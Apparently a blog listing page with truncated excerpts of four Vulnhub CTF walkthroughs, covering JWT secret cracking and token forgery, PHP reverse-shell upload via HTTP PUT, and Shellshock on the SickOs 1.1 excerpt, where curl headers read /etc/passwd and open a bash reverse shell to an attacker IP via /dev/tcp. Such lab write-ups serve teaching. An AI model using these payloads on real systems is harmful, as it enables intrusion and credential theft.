Posts

MoneyHeist:1 - Walkthrough [Vulnhub]

Here's my solution for MoneyHeist:1. The machine can be downloaded from here.

Port Scanning
Using nmap to scan all TCP ports.
$ nmap -sC -sV -p- 192.168.1.104
We find 5 ports open.

Enumeration
Browsing the web. We see we have an option to register. After registering we log in. The page says: No flag and only the admins will get it. We can guess this can be related to the user id, user role, cookies etc. We open Inspect Element and navigate to Storage Tab > Cookies. Interesting, here we find the presence of JWT tokens in cookies. Let's decode it. We browse the JWT website and decode the value. We find the token uses the HS256 algorithm. Now we put the key into a file and run hashcat against it.
$ hashcat -m 16500 key.hash /usr/share/wordlists/rockyou.txt
We get the secret key as: professor. We again browse the JWT website and try to create a forged token. We place the secret key in the Verify Signature section and alter the email's value to: admin. Now we copy this forged token

SickOs:1.2 - Walkthrough [Vulnhub]

Here's my solution for SickOs:1.2. The machine can be downloaded from here.

Port Scanning
Using nmap to scan all TCP ports.
$ nmap -sC -sV -p- 192.168.1.102
We find 2 ports open.

Enumeration
Browsing the web. Using dirb to scan directories.
$ dirb http://192.168.1.102 -r
Interesting, let's browse the /test directory. We check for HTTP methods. Interesting. We find that the PUT method is allowed, so we can easily upload the shell. Before uploading the php reverse shell file we first edit the listening IP and set the listening port number to 443. Let's upload the shell.
$ curl -v --upload-file shell.php http://192.168.1.102/test/ -0
We have successfully uploaded the shell.

Initial Access
Now to run the exploit we simply click the shell file. On the other side we start the netcat listener. We get the reverse shell.

Privilege Escalation
We check the cron directories; it seems that chkrootkit runs daily.
$ ls -la /etc/cron*
We check the version. We search for the exploit and we find one.
$ se

SickOs:1.1 - Walkthrough [Vulnhub]

Here's my solution for SickOs:1.1. The machine can be downloaded from here.

Port Scanning
Using nmap to scan all TCP ports.
$ nmap -Pn -sC -sV -p- 192.168.1.107
We find 2 ports open.

Enumeration
Before browsing the web we first set the proxy. Now let's browse the web. Using dirb to scan directories.
$ dirb http://192.168.1.107 -p 192.168.1.107:3128
Further scanning the /cgi-bin directory.
$ dirb http://192.168.1.107/cgi-bin/ -p 192.168.1.107:3128
Browsing /status.

Initial Access
Trying for Shellshock.
$ curl --proxy http://192.168.1.107:3128 -H "user-agent: () { :; }; echo; echo; /bin/sh -c 'cat /etc/passwd'" http://192.168.1.107/cgi-bin/status
This seems to work fine. Let's get the shell.
$ curl --proxy http://192.168.1.107:3128 -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.108/1234 0>&1'" http://192.168.1.107/cgi-bin/status
We get the shell.

Privilege Escalation
From www-data > sickos. We

Cheesey:Cheeseyjack - Walkthrough [Vulnhub]

Here's my solution for Cheesey:Cheeseyjack. The machine can be downloaded from here.

Port Scanning
Using nmap to scan all TCP ports.
$ nmap -sC -sV -p- 192.168.1.106
We find 11 ports open.

Enumeration
Browsing the web. Using dirb to scan the directories.
$ dirb http://192.168.1.106 -r
Browsing /it_security. Let's check this note.txt. From this message, we can take a note of the names: cheese and crab can be user names. Browsing /project_management. Interesting, a login page. Since SMB ports are open we run enum4linux against the host to find some useful information.
$ enum4linux -a 192.168.1.106
Interesting. We find 2 users: ch33sem4n and crab. The author has already given us the hint: cewl. We use cewl to generate passwords for us.
$ cewl http://192.168.1.106/project_management > password
We use burp to brute force the password of the user ch33s3m4n. We get the password as: qdpm. We browse the login page and log in with the credential Email: ch33s3m4n@cheeseyjack.local